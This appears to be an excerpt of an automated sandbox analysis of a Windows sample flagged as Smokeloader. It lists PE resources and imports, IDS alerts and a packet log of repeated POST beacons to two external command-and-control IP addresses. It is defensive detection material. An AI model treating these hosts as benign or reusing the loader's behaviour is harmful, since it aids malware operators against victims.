RT_ICON	0x27229d0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.5700959488272921
RT_ICON	0x2723878	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.6371841155234657
RT_ICON	0x2724120	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.6935483870967742
RT_ICON	0x27247e8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.7456647398843931
RT_ICON	0x2724d50	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkish	Turkey	0.5137966804979253
RT_ICON	0x27272f8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkish	Turkey	0.6128048780487805
RT_ICON	0x27283a0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkish	Turkey	0.6180327868852459
RT_ICON	0x2728d28	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkish	Turkey	0.7570921985815603
RT_ICON	0x2729208	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.337953091684435
RT_ICON	0x272a0b0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.5248194945848376
RT_ICON	0x272a958	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.5956221198156681
RT_ICON	0x272b020	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6372832369942196
RT_ICON	0x272b588	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Turkish	Turkey	0.4259336099585062
RT_ICON	0x272db30	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.5073770491803279
RT_ICON	0x272e4b8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.5070921985815603
RT_ICON	0x272e988	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.39498933901918976
RT_ICON	0x272f830	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.5546028880866426
RT_ICON	0x27300d8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.6169354838709677
RT_ICON	0x27307a0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6423410404624278
RT_ICON	0x2730d08	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.42706378986866794
RT_ICON	0x2731db0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.4245901639344262
RT_ICON	0x2732738	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.4645390070921986
RT_ICON	0x2732c08	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.28331556503198296
RT_ICON	0x2733ab0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.36913357400722024
RT_ICON	0x2734358	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.37672811059907835
RT_ICON	0x2734a20	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.3786127167630058
RT_ICON	0x2734f88	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Turkish	Turkey	0.25778008298755184
RT_ICON	0x2737530	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.275328330206379
RT_ICON	0x27385d8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.28647540983606556
RT_ICON	0x2738f60	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.32358156028368795
RT_STRING	0x27395f8	0xcc	data			0.553921568627451
RT_STRING	0x27396c8	0x50c	data			0.4473684210526316
RT_STRING	0x2739bd8	0x3aa	data			0.4616204690831556
RT_STRING	0x2739f88	0x52c	data			0.4516616314199396
RT_STRING	0x273a4b8	0x652	data			0.4338689740420272
RT_STRING	0x273ab10	0x798	data			0.41975308641975306
RT_STRING	0x273b2a8	0x84c	data			0.4129001883239171
RT_STRING	0x273baf8	0x666	data			0.4340659340659341
RT_STRING	0x273c160	0x7f6	data			0.4210009813542689
RT_STRING	0x273c958	0x758	data			0.41914893617021276
RT_STRING	0x273d0b0	0x78c	data			0.4254658385093168
RT_STRING	0x273d840	0x666	data			0.4340659340659341
RT_STRING	0x273dea8	0x69e	data			0.4268004722550177
RT_STRING	0x273e548	0x54c	data			0.44026548672566373
RT_STRING	0x273ea98	0x26	data			0.5526315789473685
RT_GROUP_ICON	0x272e920	0x68	data	Turkish	Turkey	0.7019230769230769
RT_GROUP_ICON	0x27393c8	0x76	data	Turkish	Turkey	0.6779661016949152
RT_GROUP_ICON	0x2729190	0x76	data	Turkish	Turkey	0.6610169491525424
RT_GROUP_ICON	0x2732ba0	0x68	data	Turkish	Turkey	0.7211538461538461
RT_VERSION	0x2739440	0x1b4	data			0.5848623853211009

Imports

DLL

Import

KERNEL32.dll

GetConsoleAliasExesLengthA, DeleteVolumeMountPointA, OpenJobObjectA, ReadConsoleA, InterlockedDecrement, GlobalSize, SetDefaultCommConfigW, InterlockedCompareExchange, GetComputerNameW, SetEvent, GetNumaAvailableMemoryNode, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesLengthA, SetCommState, GetConsoleWindow, ReadConsoleOutputW, GetVersionExW, GetStringTypeExW, HeapDestroy, GetFileAttributesA, GetTimeFormatW, SearchPathW, GetBinaryTypeA, DisconnectNamedPipe, LCMapStringA, GetLastError, GetProcAddress, MoveFileW, SetStdHandle, GetNumaHighestNodeNumber, LoadLibraryA, LocalAlloc, WritePrivateProfileStringA, QueryDosDeviceW, GetModuleFileNameA, BuildCommDCBA, FatalAppExitA, GetShortPathNameW, SetCalendarInfoA, FindAtomW, SetConsoleMode, PulseEvent, HeapAlloc, MultiByteToWideChar, Sleep, ExitProcess, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, WriteFile, GetStdHandle, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize

ADVAPI32.dll

ClearEventLogW

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-12T23:27:36.506031+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49736	190.224.203.37	80	TCP
2024-10-12T23:27:37.897672+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49737	190.224.203.37	80	TCP
2024-10-12T23:27:39.375920+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49738	190.224.203.37	80	TCP
2024-10-12T23:27:40.762602+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49739	190.224.203.37	80	TCP
2024-10-12T23:27:42.132225+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49740	190.224.203.37	80	TCP
2024-10-12T23:27:43.504764+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49741	190.224.203.37	80	TCP
2024-10-12T23:27:44.877319+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49742	190.224.203.37	80	TCP
2024-10-12T23:27:46.243719+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49743	190.224.203.37	80	TCP
2024-10-12T23:27:47.659001+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49744	190.224.203.37	80	TCP
2024-10-12T23:27:49.040046+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49745	190.224.203.37	80	TCP
2024-10-12T23:27:50.403081+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49746	190.224.203.37	80	TCP
2024-10-12T23:27:51.781560+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49747	190.224.203.37	80	TCP
2024-10-12T23:27:53.491806+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49748	190.224.203.37	80	TCP
2024-10-12T23:27:54.872226+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49749	190.224.203.37	80	TCP
2024-10-12T23:27:56.260005+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49750	190.224.203.37	80	TCP
2024-10-12T23:27:57.931307+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49751	190.224.203.37	80	TCP
2024-10-12T23:27:59.334639+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49752	190.224.203.37	80	TCP
2024-10-12T23:28:00.783631+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49753	190.224.203.37	80	TCP
2024-10-12T23:28:02.177397+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49760	190.224.203.37	80	TCP
2024-10-12T23:28:03.568585+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49772	190.224.203.37	80	TCP
2024-10-12T23:28:04.965664+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49778	190.224.203.37	80	TCP
2024-10-12T23:28:06.355448+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49789	190.224.203.37	80	TCP
2024-10-12T23:28:07.767337+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49800	190.224.203.37	80	TCP
2024-10-12T23:28:09.198762+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49811	190.224.203.37	80	TCP
2024-10-12T23:28:12.186615+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49828	190.224.203.37	80	TCP
2024-10-12T23:28:13.598657+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49839	190.224.203.37	80	TCP
2024-10-12T23:28:14.981042+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49848	190.224.203.37	80	TCP
2024-10-12T23:28:16.368431+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49856	190.224.203.37	80	TCP
2024-10-12T23:28:17.790439+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49862	190.224.203.37	80	TCP
2024-10-12T23:28:19.160968+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49873	190.224.203.37	80	TCP
2024-10-12T23:28:20.515030+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49882	190.224.203.37	80	TCP
2024-10-12T23:28:21.888189+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49890	190.224.203.37	80	TCP
2024-10-12T23:28:23.273942+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49901	190.224.203.37	80	TCP
2024-10-12T23:28:24.646829+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49908	190.224.203.37	80	TCP
2024-10-12T23:28:26.025285+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49918	190.224.203.37	80	TCP
2024-10-12T23:28:27.541883+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49929	190.224.203.37	80	TCP
2024-10-12T23:29:37.673928+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50039	190.224.203.37	80	TCP
2024-10-12T23:29:45.033278+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50040	190.224.203.37	80	TCP
2024-10-12T23:29:53.061102+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50041	190.224.203.37	80	TCP
2024-10-12T23:30:03.157572+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50042	190.224.203.37	80	TCP
2024-10-12T23:30:20.229015+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	57093	190.220.21.28	80	TCP
2024-10-12T23:30:33.637008+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	57094	190.220.21.28	80	TCP
2024-10-12T23:30:46.932059+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	57095	190.220.21.28	80	TCP
2024-10-12T23:31:01.016369+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	57096	190.220.21.28	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 12, 2024 23:27:34.815587044 CEST	49736	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:34.820499897 CEST	80	49736	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:34.822983980 CEST	49736	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:34.823142052 CEST	49736	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:34.826426983 CEST	49736	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:34.827928066 CEST	80	49736	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:34.831273079 CEST	80	49736	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:36.503072023 CEST	80	49736	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:36.505882978 CEST	80	49736	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:36.506031036 CEST	49736	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:36.510360003 CEST	49736	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:36.513678074 CEST	49737	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:36.515193939 CEST	80	49736	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:36.518656015 CEST	80	49737	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:36.518764019 CEST	49737	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:36.518877029 CEST	49737	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:36.518918991 CEST	49737	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:36.523752928 CEST	80	49737	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:36.523905039 CEST	80	49737	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:37.896641970 CEST	80	49737	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:37.897609949 CEST	80	49737	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:37.897671938 CEST	49737	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:37.897736073 CEST	49737	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:37.901360035 CEST	49738	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:37.902534008 CEST	80	49737	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:37.906385899 CEST	80	49738	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:37.906455040 CEST	49738	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:37.906579971 CEST	49738	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:37.906611919 CEST	49738	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:37.911425114 CEST	80	49738	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:37.911626101 CEST	80	49738	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:39.375077009 CEST	80	49738	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:39.375842094 CEST	80	49738	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:39.375920057 CEST	49738	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:39.375972986 CEST	49738	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:39.379412889 CEST	49739	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:39.381469011 CEST	80	49738	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:39.385200977 CEST	80	49739	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:39.386837959 CEST	49739	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:39.386974096 CEST	49739	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:39.386974096 CEST	49739	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:39.391892910 CEST	80	49739	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:39.392430067 CEST	80	49739	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:40.760502100 CEST	80	49739	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:40.762372971 CEST	80	49739	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:40.762602091 CEST	49739	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:40.762602091 CEST	49739	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:40.765214920 CEST	49740	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:40.767662048 CEST	80	49739	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:40.770262957 CEST	80	49740	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:40.770347118 CEST	49740	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:40.770448923 CEST	49740	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:40.770503998 CEST	49740	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:40.775244951 CEST	80	49740	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:40.775367022 CEST	80	49740	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:42.131206036 CEST	80	49740	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:42.132147074 CEST	80	49740	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:42.132225037 CEST	49740	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:42.132278919 CEST	49740	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:42.135545015 CEST	49741	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:42.137074947 CEST	80	49740	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:42.140360117 CEST	80	49741	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:42.140451908 CEST	49741	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:42.146588087 CEST	49741	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:42.146657944 CEST	49741	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:42.151371002 CEST	80	49741	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:42.151464939 CEST	80	49741	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:43.503515005 CEST	80	49741	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:43.504702091 CEST	80	49741	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:43.504764080 CEST	49741	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:43.504837990 CEST	49741	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:43.508091927 CEST	49742	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:43.509987116 CEST	80	49741	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:43.513011932 CEST	80	49742	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:43.513081074 CEST	49742	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:43.513222933 CEST	49742	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:43.513248920 CEST	49742	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:43.518177986 CEST	80	49742	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:43.518333912 CEST	80	49742	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:44.876148939 CEST	80	49742	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:44.877247095 CEST	80	49742	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:44.877319098 CEST	49742	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:44.881846905 CEST	49742	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:44.885446072 CEST	49743	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:44.886694908 CEST	80	49742	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:44.890295982 CEST	80	49743	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:44.890367031 CEST	49743	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:44.890516996 CEST	49743	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:44.890553951 CEST	49743	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:44.895330906 CEST	80	49743	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:44.895437956 CEST	80	49743	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:46.242913961 CEST	80	49743	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:46.243643999 CEST	80	49743	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:46.243719101 CEST	49743	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:46.247036934 CEST	49743	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:46.250013113 CEST	49744	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:46.251806021 CEST	80	49743	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:46.254838943 CEST	80	49744	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:46.254915953 CEST	49744	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:46.255208969 CEST	49744	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:46.255251884 CEST	49744	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:46.259970903 CEST	80	49744	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:46.260003090 CEST	80	49744	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:47.657882929 CEST	80	49744	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:47.658876896 CEST	80	49744	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:47.659001112 CEST	49744	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:47.659109116 CEST	49744	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:47.662795067 CEST	49745	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:47.664122105 CEST	80	49744	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:47.667725086 CEST	80	49745	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:47.667881012 CEST	49745	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:47.668030024 CEST	49745	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:47.668064117 CEST	49745	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:47.672854900 CEST	80	49745	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:47.672878981 CEST	80	49745	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:49.038738966 CEST	80	49745	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:49.039961100 CEST	80	49745	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:49.040045977 CEST	49745	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:49.040111065 CEST	49745	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:49.042783976 CEST	49746	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:49.045084000 CEST	80	49745	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:49.047774076 CEST	80	49746	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:49.047858000 CEST	49746	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:49.048058987 CEST	49746	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:49.048110962 CEST	49746	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:49.053647995 CEST	80	49746	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:49.053678036 CEST	80	49746	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:50.401794910 CEST	80	49746	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:50.402978897 CEST	80	49746	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:50.403080940 CEST	49746	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:50.403178930 CEST	49746	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:50.405739069 CEST	49747	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:50.408060074 CEST	80	49746	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:50.410811901 CEST	80	49747	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:50.410960913 CEST	49747	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:50.411030054 CEST	49747	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:50.411051989 CEST	49747	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:50.416424036 CEST	80	49747	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:50.416508913 CEST	80	49747	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:51.780636072 CEST	80	49747	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:51.781491995 CEST	80	49747	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:51.781559944 CEST	49747	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:51.781608105 CEST	49747	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:51.784224987 CEST	49748	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:51.786499023 CEST	80	49747	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:51.789125919 CEST	80	49748	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:51.789197922 CEST	49748	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:51.789321899 CEST	49748	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:51.789339066 CEST	49748	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:51.794095039 CEST	80	49748	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:51.794272900 CEST	80	49748	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:53.491604090 CEST	80	49748	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:53.491662025 CEST	80	49748	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:53.491715908 CEST	80	49748	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:53.491806030 CEST	49748	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:53.491894960 CEST	49748	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:53.491894960 CEST	49748	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:53.494081974 CEST	49749	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:53.496835947 CEST	80	49748	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:53.499346972 CEST	80	49749	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:53.499444008 CEST	49749	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:53.499587059 CEST	49749	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:53.499623060 CEST	49749	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:53.504631996 CEST	80	49749	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:53.504700899 CEST	80	49749	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:54.871311903 CEST	80	49749	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:54.872158051 CEST	80	49749	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:54.872226000 CEST	49749	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:54.872309923 CEST	49749	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:54.874515057 CEST	49750	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:54.877053976 CEST	80	49749	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:54.879362106 CEST	80	49750	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:54.879440069 CEST	49750	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:54.879584074 CEST	49750	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:54.879584074 CEST	49750	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:27:54.884325981 CEST	80	49750	190.224.203.37	192.168.2.4
Oct 12, 2024 23:27:54.884335041 CEST	80	49750	190.224.203.37	192.168.2.4
